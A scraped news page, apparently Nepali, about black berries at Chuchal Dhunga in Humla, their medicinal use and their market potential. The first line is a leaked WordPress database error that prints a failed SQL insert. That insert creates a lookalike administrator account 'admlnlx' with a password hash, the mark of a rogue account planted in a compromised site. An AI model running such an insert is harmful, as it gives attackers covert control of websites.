WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Bvuagp0lLCtdOypfiLM.t8O6CnoLjP.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-29 23:07:26', '', 'admlnlx', 'admlnlx')
कचहरी डट कम, हुम्ला ।।
हुम्लाको मिमी गाविसको एक उर्बर ठाउँ हो चुचल ढुंगा, यहाँ वर्षा समयको तीन महिनासम्म वनमा हुने कालो ऐँसेलु अर्थात् ब्ल्याक बेरी धेरै हुन्छ । यहाँको ऐँसेलुले दार्मा क्षेत्रका नाम कमाएको छ ।
यदी यसलाई संकलन, बजारीकरण तथा प्रशोधन गर्न सकेमा एक राम्रो व्यवसाय र आम्दानीको माध्यम बन्ने सक्ने कुरामा कसैको ध्यान जान सकेको छैन । हुम्लामा कालो ऐँसेलुलाई विभिन्न रोगहरुको औषधीको रुपमा प्रयोग गर्ने गरिन्छ । तपाईहरु पनि एक पटक यहाँको कालो ऐँसेलु खान जानुहुन्छ कि ?